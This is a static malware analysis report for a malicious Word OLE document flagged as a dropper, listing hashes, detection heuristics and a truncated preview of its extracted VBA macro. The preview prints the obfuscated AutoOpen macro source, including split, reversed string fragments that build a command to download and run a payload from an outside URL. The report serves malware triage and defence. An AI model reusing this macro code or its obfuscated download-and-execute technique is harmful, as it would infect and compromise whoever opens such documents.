Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 650c52c7824431a5…

MALICIOUS

Office (OLE)

127.0 KB Created: 2018-05-02 21:35:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 44c4b0456185526455892b15ffab299a SHA-1: 916368a556a07051e7225f8b28bde21d0d474e39 SHA-256: 650c52c7824431a59dbba1668b9e119d925d035dec91b11a04aa1fe96902591e
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a legacy WordBasic Autoopen macro. This macro utilizes a Shell() call, indicating an intent to execute external commands, likely for downloading and running a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6529701-0' further supports its dropper functionality.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6529701-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6529701-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 148428 bytes
SHA-256: 26a97d07df0f650f98e4dc5418ac9db5129da4ba586163fd9b3cc5a88b6a83fd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "zTYJnQbdkSvi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BOGzBc(YJIoP)
IOakuA = Chr(17913)
      For YFqUW = 63075 To 97827
         iWrrnc = 42867 / 23190 / cWBNnp * 81497 - 78778 - Tan(1 / Rnd(tmFFr))
Next
End Sub
Sub QQcIQc(vJkamw)
vjsOl = Chr(35212)
      For IKkQzf = 632 To 76125
         jdiwb = 43829 / 99276 / vWzar * 55281 - 26176 - Tan(1 / Rnd(uQZMu))
Next
TZRIFr = Chr(86045)
      For wfIzB = 93076 To 14343
         zZjiSP = 40707 / 6685 / hXNFP * 50658 - 51167 - Tan(1 / Rnd(sKFfS))
Next
HUfZS = Chr(35644)
      For bRvuTA = 62248 To 30139
         DENrY = 39721 / 60275 / hEhfI * 72995 - 3466 - Tan(1 / Rnd(iIYKn))
Next
End Sub
Sub DkWGFS(wZuCU)
BRbsn = Chr(79369)
      For sNkOT = 60104 To 87563
         osHFk = 27751 / 1882 / VRONzk * 60065 - 75635 - Tan(1 / Rnd(nfADDP))
Next
UTwpzH = Chr(74981)
      For YmHhmw = 69686 To 84680
         oGaYb = 41132 / 15275 / zlfztV * 70850 - 55315 - Tan(1 / Rnd(kRRLc))
Next
End Sub
Sub Autoopen()
On Error Resume Next
iooMc = Chr(96334)
      For jDnzP = 95231 To 78742
         szoHC = 41994 / 14746 / fRXEQM * 36490 - 50866 - Tan(1 / Rnd(LsvknJ))
Next
tQDiituvjGDhc (jwFbMt + zpFkHWzkcEN + nnIrT)
DarXNJ = Chr(90257)
      For tkTkN = 19642 To 7993
         tcFoJ = 46276 / 10367 / fOlLj * 31850 - 14975 - Tan(1 / Rnd(zzmkB))
Next
End Sub
Sub XdOZq(lrzjB)
ujmiSf = Chr(40770)
      For rwXjVd = 54336 To 99805
         PXTDUF = 53347 / 51138 / hsioPC * 19287 - 2653 - Tan(1 / Rnd(bhUiH))
Next
ZjYGi = Chr(6991)
      For kmFkL = 65825 To 58937
         aKEiz = 55242 / 95251 / jVZUH * 1150 - 35075 - Tan(1 / Rnd(kQDin))
Next
VvjUHs = Chr(67157)
      For qbWwBW = 31698 To 92685
         mbipk = 10685 / 67613 / kTpzv * 58497 - 718 - Tan(1 / Rnd(tpICcU))
Next
End Sub
Sub TDizz(zvzoG)
CJrkq = Chr(95164)
      For XYtfv = 94964 To 43004
         HhIui = 34498 / 43281 / lGIlu * 70156 - 47132 - Tan(1 / Rnd(LpNwcC))
Next
End Sub

Attribute VB_Name = "SENzhaY"
Sub AbAsNr(YzfwFi)
MUnzEU = Chr(12773)
      For YhEdpp = 39975 To 39955
         kNXHKu = 84592 / 21526 / RQOSdz * 49532 - 69397 - Tan(1 / Rnd(tJhWDc))
Next
End Sub
Function zpFkHWzkcEN()
On Error Resume Next
SmmWf = Chr(3491)
      For sAWXR = 32030 To 50206
         DzkEHR = 15113 / 66060 / aDsTkC * 35426 - 70983 - Tan(1 / Rnd(qvDtJw))
Next
wYHkKlt = ACXrLz("HRjQ'+'5'+'fds//'+':ptth '+'lw'+'B'+' = XCDA'+'L1'+'N'+';'+')33'+'1282 ,00'+'0'+'0DMi", 46856 - 46856 + 4 + 46856 - 46856, 46856 - 46856 + 78 + 46856 - 46856)
ANjYwN = Chr(56068)
      For wBOEM = 59818 To 4573
         EAvbI = 90410 / 16045 / Empaii * 18752 - 79033 - Tan(1 / Rnd(RGDYJp))
Next
QwmbwD = Chr(15160)
      For AAFjs = 59181 To 7315
         iuumT = 94716 / 91674 / ivtuTS * 16986 - 20047 - Tan(1 / Rnd(JGkSPQ))
Next
BSmtjbOEs = ACXrLz("hp.c[((eCAlpER.)'}}{hcta'+'c};'+'kaerb;)CDSL1'+'N'+'()izb,", 25848 - 25848 + 5 + 25848 - 25848, 25848 - 25848 + 51 + 25848 - 25848)
UBozwB = Chr(74354)
      For oNwikJ = 23325 To 36872
         LsDJM = 6046 / 64636 / vwjYTB * 36649 - 58426 - Tan(1 / Rnd(RRIwc))
Next
niiShl = Chr(32953)
      For mMhcJJ = 19542 To 66361
         UWDTvc = 75666 / 65552 / DXiws * 18380 - 32389 - Tan(1 / Rnd(FqtmE))
Next
TVOQwqin = ACXrLz("fM0nray'+'.8'+'poop=l?p'+'hp'+'.'+'vtset'+'/'+'KRAN/'+'mo'+'c'+'.r'+'ew'+'4r'+'e'+'woXscl", 64105 - 64105 + 6 + 64105 - 64105, 64105 - 64105 + 81 + 64105 - 64105)
cKjjBb = Chr(38036)
      For NidHi = 97518 To 54893
         Gvkait = 99152 / 77225 / XLDDT * 78777 - 5078 - Tan(1 / Rnd(XaILv))
Next
aGzhVR = Chr(52414)
      For mPqSj = 47334 To 78941
         zQJIC = 52382 / 88687 / qimEVU * 63090 - 64410 - Tan(1 / Rnd(QTnZM))
Next
YjGPjBMXFb = ACXrLz("%,XbEw)'xbma", 72373 - 72373 + 4 + 72373 - 72373, 72373 - 72373 + 3 + 72373 - 72373)
OwmmcW = Chr(64387)
      For EpRXaU = 3022 To 92224
     
... (truncated)